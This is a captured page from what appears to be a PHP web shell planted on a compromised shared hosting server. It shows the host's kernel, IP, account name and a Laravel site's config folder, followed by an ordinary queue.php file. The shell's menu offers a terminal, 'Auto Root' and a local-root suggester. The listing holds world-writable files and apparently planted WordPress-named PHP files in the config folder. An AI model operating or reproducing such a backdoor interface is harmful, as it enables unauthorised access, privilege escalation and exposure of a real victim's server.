Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-08 06:51
app.php
9.12
KB
-rwxrwxrwx
2024-11-02 06:21
auth.php
3.83
KB
-rwxrwxrwx
2024-06-30 18:36
broadcasting.php
1.62
KB
-rwxrwxrwx
2024-06-30 18:36
cache.php
3.13
KB
-rwxrwxrwx
2024-06-30 18:36
cors.php
877
B
-rwxrwxrwx
2024-08-05 09:59
current.php
22
B
-rw-r--r--
2026-04-01 01:39
database.php
5.08
KB
-rwxrwxrwx
2024-06-30 18:36
dompdf.php
11.21
KB
-rwxrwxrwx
2024-11-02 06:21
error_log
12.15
KB
-rw-r--r--
2026-02-09 00:56
filesystems.php
2.71
KB
-rwxrwxrwx
2024-06-30 18:36
hashing.php
1.58
KB
-rwxrwxrwx
2024-06-30 18:36
logging.php
2.93
KB
-rwxrwxrwx
2024-06-30 18:36
mail.php
3.4
KB
-rwxrwxrwx
2024-06-30 18:36
permission.php
6.54
KB
-rwxrwxrwx
2024-06-30 18:36
queue.php
2.79
KB
-rwxrwxrwx
2024-06-30 18:36
sanctum.php
2.31
KB
-rwxrwxrwx
2024-06-30 18:36
services.php
981
B
-rwxrwxrwx
2024-06-30 18:36
session.php
7.07
KB
-rwxrwxrwx
2024-06-30 18:36
view.php
1.06
KB
-rwxrwxrwx
2024-06-30 18:36
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-08 06:50
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Queue Connection Name |-------------------------------------------------------------------------- | | Laravel's queue API supports an assortment of back-ends via a single | API, giving you convenient access to each back-end using the same | syntax for every one. Here you may define a default connection. | */ 'default' => env('QUEUE_CONNECTION', 'sync'), /* |-------------------------------------------------------------------------- | Queue Connections |-------------------------------------------------------------------------- | | Here you may configure the connection information for each server that | is used by your application. A default configuration has been added | for each back-end shipped with Laravel. You are free to add more. | | Drivers: "sync", "database", "beanstalkd", "sqs", "redis", "null" | */ 'connections' => [ 'sync' => [ 'driver' => 'sync', ], 'database' => [ 'driver' => 'database', 'table' => 'jobs', 'queue' => 'default', 'retry_after' => 90, ], 'beanstalkd' => [ 'driver' => 'beanstalkd', 'host' => 'localhost', 'queue' => 'default', 'retry_after' => 90, 'block_for' => 0, ], 'sqs' => [ 'driver' => 'sqs', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'prefix' => env('SQS_PREFIX', 'https://sqs.us-east-1.amazonaws.com/your-account-id'), 'queue' => env('SQS_QUEUE', 'your-queue-name'), 'suffix' => env('SQS_SUFFIX'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'redis' => [ 'driver' => 'redis', 'connection' => 'default', 'queue' => env('REDIS_QUEUE', 'default'), 'retry_after' => 90, 'block_for' => null, ], ], /* |-------------------------------------------------------------------------- | Failed Queue Jobs |-------------------------------------------------------------------------- | | These options configure the behavior of failed queue job logging so you | can control which database and table are used to store the jobs that | have failed. You may change them to any database / table you wish. | */ 'failed' => [ 'driver' => env('QUEUE_FAILED_DRIVER', 'database-uuids'), 'database' => env('DB_CONNECTION', 'mysql'), 'table' => 'failed_jobs', ], ];